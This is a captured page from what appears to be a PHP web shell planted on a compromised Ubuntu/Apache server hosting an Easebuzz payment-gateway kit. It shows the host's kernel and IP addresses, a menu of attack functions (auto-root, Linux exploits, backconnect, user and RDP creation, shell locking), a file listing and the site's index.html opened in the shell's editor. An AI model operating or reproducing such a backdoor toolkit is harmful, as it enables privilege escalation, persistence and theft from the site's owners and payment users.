Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.109.147
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
admission /
ebbuze /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
easebuzz-lib
[ DIR ]
drwxrwxr-x
view
[ DIR ]
drwxrwxr-x
.DS_Store
6
KB
-rwxr-xr-x
README.md
7.6
KB
-rwxr-xr-x
easebuzz.php
8.57
KB
-rwxr-xr-x
easebuzz_order_api.php
3.52
KB
-rwxr--r--
ebbuze_order_api.php
932
B
-rwxr--r--
ebbuze_order_api2.php
1000
B
-rwxr--r--
index.html
2.54
KB
-rwxr-xr-x
response.php
9.03
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="stylesheet" href="assets/css/style.css"> <title>Easebuzz Payment Gateway Kit</title> </head> <body> <div class="grid-container"> <header class="wrapper"> <div class="logo"> <a href="index.html"> <img src="assets/images/eb-logo.svg" alt="Easebuzz"> </a> </div> <div class="hedding"> <a href="https://docs.easebuzz.in/"> <h2><spam>Easebuzz Documentation</spam></h2> </a> </div> </header> <div class="container"> <div class="card-container"> <div class="card"> <h2>Easebuzz-lib For PHP</h2> <hr> <p>There are five Easebuzz Payment Gateway API</p> <ul class="tabs"> <li id="initiate_payment_iframe_tab"> <a href="view/initiate_payment_iframe.html">Initiate Payment API (iframe)</a> </li> <li id="initiate_payment_tab"> <a href="view/initiate_payment.html">Initiate Payment API</a> </li> <li id="transaction_tab"> <a href="view/transaction.html">Transaction API</a> </li> <li id="transaction_date_tab"> <a href="view/transaction_date.html">Transaction Date API</a> </li> <li id="refund_tab"> <a href="view/refund.html">Refund API</a> </li> <li id="payout_tab"> <a href="view/payout.html">Payout API</a> </li> </ul> </div> </div> </div> </div> <!-- import javascript file --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script> <script src="assets/js/custom_javascript.js"></script> </body> </html>
Close